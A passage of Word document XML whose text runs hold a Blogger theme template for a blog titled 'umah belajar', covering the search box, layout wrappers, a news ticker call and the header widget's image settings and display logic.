    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;div class='search-box'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='search-close'&gt;&lt;a class='s_close' href='javascript:void(0);'&gt;&lt;i class='ion-close-round'/&gt;&lt;/a&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;form action='/search' method='get'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;input name='q' placeholder='Search ... ' type='text'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;button class='searchaction'&gt;&lt;i class='ion-ios-search'/&gt;&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;&lt;/div&gt;&lt;!--/searchwrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;div class='kistsune-blossom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;div class='body-fauxcolumns'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div class='fauxcolumn-outer body-fauxcolumn-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;div class='cap-top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;div class='fauxborder-left'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='fauxborder-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='fauxcolumn-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;div class='cap-bottom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;div class='content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div class='content-fauxcolumns'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;div class='fauxcolumn-outer content-fauxcolumn-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='cap-top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='fauxborder-left'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;div class='fauxborder-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;div class='fauxcolumn-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='cap-bottom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div class='content-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;div class='content-cap-top cap-top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;div class='fauxborder-left content-fauxborder-left'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='fauxborder-right content-fauxborder-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='content-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;header class='regular'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;div class='header-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='header-cap-top cap-top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='row-custom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='wrapper topmenus'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='melesa-news wrapper'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='container'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div id='melesa_news'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;script type='text/javascript'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            melesa_news({MaxPost:10});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='wrapper nav-bak'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='container'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='NavS' id='NavS'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='search-act'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;a class='search' href='javascript:void(0);'&gt;&lt;i class='ion-ios-search'/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='container'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='h-break'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='header-logo'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='fauxborder-left header-fauxborder-left'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='fauxborder-right header-fauxborder-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='region-inner header-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;b:section class='header' id='header' maxwidgets='1' name='Header' showaddelement='no'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget id='Header1' locked='false' title='umah belajar (Header)' type='Header' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:widget-setting name='displayUrl'&gt;http://3.bp.blogspot.com/-rAliM9jR57c/XYWyXd4OyVI/AAAAAAAAACQ/zkoa4YuMleYUWpFV-TQ1VUWuq9_oY-N3QCK4BGAYYCw/s1600/youtube_profile_image.png&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:widget-setting name='displayHeight'&gt;800&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:widget-setting name='sectionWidth'&gt;600&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:widget-setting name='useImage'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                  &lt;b:widget-setting name='shrinkToFit'&gt;false&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:widget-setting name='imagePlacement'&gt;REPLACE&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:widget-setting name='displayWidth'&gt;800&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:if cond='data:useImage'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;b:if cond='data:imagePlacement == &amp;quot;BEHIND&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>Show image as background to text. You can't really calculate the width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>reliably in JS because margins are not taken into account by any of</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>clientWidth, offsetWidth or scrollWidth, so we don't force a minimum</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>width if the user is using shrink to fit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>This results in a margin-width's worth of pixels being cropped. If the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>user is not using shrink to fit then we expand the header.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;b:if cond='data:mobile'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;div id='header-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='titlewrapper' style='background: transparent'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;h1 class='title' style='background: transparent; border-width: 0px'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:include name='title'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:include name='description'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;div expr:style='&amp;quot;background-image: url(\&amp;quot;&amp;quot; + data:sourceUrl + &amp;quot;\&amp;quot;); &amp;quot;                      + &amp;quot;background-position: &amp;quot;                      </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>+ data:backgroundPositionStyleStr + &amp;quot;; &amp;quot;                      + data:widthStyleStr                      + &amp;quot;min-height: &amp;quot; + data:height                      + &amp;quot;_height: &amp;quot; + data:height                      + &amp;quot;background-repeat: no-repeat; &amp;quot;' id='header-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='titlewrapper' style='background: transparent'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;h1 class='title' style='background: transparent; border-width: 0px'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:include name='title'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:include name='description'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;!--Show the image only--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;div id='header-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;a expr:href='data:blog.homepageUrl' style='display: block'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;img expr:alt='data:title' expr:height='data:height' expr:id='data:widget.instanceId + &amp;quot;_headerimg&amp;quot;' expr:src='data:sourceUrl' expr:width='data:width' style='display: block'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;!--Show the description--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:if cond='data:imagePlacement == &amp;quot;BEFORE_DESCRIPTION&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
